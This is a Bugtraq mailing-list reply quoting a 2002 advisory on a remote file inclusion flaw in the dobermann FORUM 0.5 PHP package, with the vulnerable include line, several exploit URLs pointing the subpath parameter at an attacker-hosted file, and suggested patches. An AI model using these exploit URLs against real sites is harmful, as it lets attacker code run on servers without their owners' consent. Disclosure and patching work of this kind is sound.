Or place a: -------------------- <? $subpath = ''; ?> -------------------- Right above the place where the actual $subpath is being set. Mark > -----Original Message----- > From: Frog Man [mailto:leseulfrog@hotmail.com] > Sent: zondag 27 oktober 2002 P 23:53 > To: bugtraq@securityfocus.com > Subject: dobermann FORUM (php) > > > Informations : > °°°°°°°°°°°°°° > Product : dobermann FORUM > version : 0.5 > website : http://www.le-dobermann.com > Problem : Include file > > PHP Code/location : > °°°°°°°°°°°°°°°°°°° > entete.php > enteteacceuil.php > topic/entete.php : > ------------------------------------------ > <?php @include $subpath."banniere.php"; ?> > ------------------------------------------ > > index.php > newtopic.php : > ------------------------ > @require "config.php"; > @include("entete.php"); > ------------------------ > > Exploits : > °°°°°°°°°° http://[target]/entete.php?subpath=http://[attacker]/ > http://[target]/enteteacceuil.php?subpath=http://[attacker]/ > http://[target]/topic/entete.php?subpath=http://[attacker]/ > http://[target]/index.php?subpath=http://[attacker]/ > http://[target]/newtopic.php?subpath=http://[attacker]/ > with > http://[attacker]/banniere.php > > Patch : > °°°°°°° > In files : > ------------------ > entete.php > enteteacceuil.php > topic/entete.php > ------------------ > replace the line : > ------------------------------------------ > <?php @include $subpath."banniere.php"; ?> > ------------------------------------------ > by : > ------------------------------------------ > <?php > $banfile=$subpath."banniere.php"; > if (file_exists($banfile)){ > @include $banfile; } > ?> > ------------------------------------------ > > > > More details in french : > http://www.frog-> man.org/tutos/dobermannFORUM.txt > translated > by Google : > http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog- man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859- 1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
